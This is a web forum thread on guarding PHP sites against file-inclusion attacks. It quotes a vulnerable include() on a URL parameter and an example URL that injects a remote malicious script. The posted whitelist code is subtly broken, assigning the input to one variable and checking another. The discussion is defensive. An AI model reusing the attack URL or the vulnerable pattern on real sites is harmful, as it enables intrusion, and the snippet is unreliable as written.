Forum Moderators: coopster
For example, I saw one website where the urls were all index.php?a=filename and index.php was a template with:
include($a);
in the middle. If someone were to form a url such as index.php?a=http://www.theirdomain.com/maliciousscript.php,
problems would have ensued.
With a few new sites that I am designing, I will be doing the very thing outlined above, based on advice that I received here at WW [webmasterworld.com].
Now, I am 'cloaking' my urls using mod_rewrite, making them all .html files. So, this in effect would hide the fact that my site even uses anything dynamic, let alone PHP. But still, I'm sure there may be ways to figure this out, is there anything else that I can do to be sure that I am safe?
Personnally I use a database to store the content, which means I only use hard-coded include() statements for function libraries and to initialize variables/constants.
If you feel using files is necessary for your projects, I would suggest that you keep a textfile with all the filenames your script is allowed to call, then check if the GET-method passed value is somewhere in this file before include()-ing it
As this textfile is not intented for publication you can adequately protect if from the http server with a .htaccess file for exemple (assuming you're using Apache).
How's this for a solution? (picked from alistapart)
$acceptable_pages = array(
'test',
'another',
'photos',
'projects'
);// get the page from the URL
$twomaroon = $_REQUEST[ 'page' ];
// make sure the page is in the acceptable pages array
if ( in_array( $page, $acceptable_pages ) )
{
include("{$page}.php");
}
else
{
// 404 page
include( "error.php" );
}
I would include this in my template.php file, for example. I imagine that seeing this very basic code is making you both mash your teeth, but this seems to be a simple and effective solution.
It seems kinda thin and unelegante to me as well - however, I am class="rookie" with PHP, and it does get the job done.